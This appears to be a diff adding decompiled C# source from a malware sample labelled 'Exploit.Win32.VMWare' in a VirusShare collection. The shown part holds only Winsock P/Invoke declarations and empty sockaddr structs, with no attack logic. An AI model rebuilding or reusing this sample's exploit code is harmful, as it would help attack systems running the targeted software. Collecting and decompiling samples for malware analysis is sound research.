+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern unsafe int connect([In] uint obj0, [In] sockaddr* obj1, [In] int obj2);
+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern unsafe uint inet_addr([In] sbyte* obj0);
+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern unsafe int atoi([In] sbyte* obj0);
+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern ushort htons([In] ushort obj0);
+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern uint socket([In] int obj0, [In] int obj1, [In] int obj2);
+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern unsafe int WSAStartup([In] ushort obj0, [In] WSAData* obj1);
+
+  [SuppressUnmanagedCodeSecurity]
+  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
+  public static extern uint _mainCRTStartup();
+}
@@ -0,0 +1,15 @@
+// Decompiled with JetBrains decompiler
+// Type: sockaddr
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[MiscellaneousBits(1)]
+[DebugInfoInPDB]
+[StructLayout(LayoutKind.Sequential, Size = 16, Pack = 1)]
+internal struct sockaddr
+{
+}
@@ -0,0 +1,15 @@
+// Decompiled with JetBrains decompiler
+// Type: sockaddr_in
+// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
+
+using Microsoft.VisualC;
+using System.Runtime.InteropServices;
+
+[DebugInfoInPDB]
+[MiscellaneousBits(1)]
+[StructLayout(LayoutKind.Sequential, Size = 16, Pack = 1)]
+internal struct sockaddr_in
+{
+}